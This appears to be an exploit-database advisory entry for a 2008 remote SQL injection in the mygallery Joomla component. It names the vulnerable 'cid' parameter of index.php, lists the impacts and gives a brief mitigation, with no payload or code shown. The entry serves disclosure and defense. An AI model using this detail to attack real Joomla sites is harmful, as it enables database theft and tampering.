Vendor: mygallery Joomla Component
By: HouSSamix From H-T TeaM
CVSS: 9 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: mygallery Joomla Component
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Joomla Component mygallery Remote SQL Injection Exploit
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'cid' parameter to the 'index.php' script. A remote attacker can execute arbitrary SQL commands in the application's database, cause denial of service, access or modify sensitive data, exploit vulnerabilities in the underlying database and, in certain cases, execute arbitrary code on the system.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered, and special characters should be escaped before being passed to the database.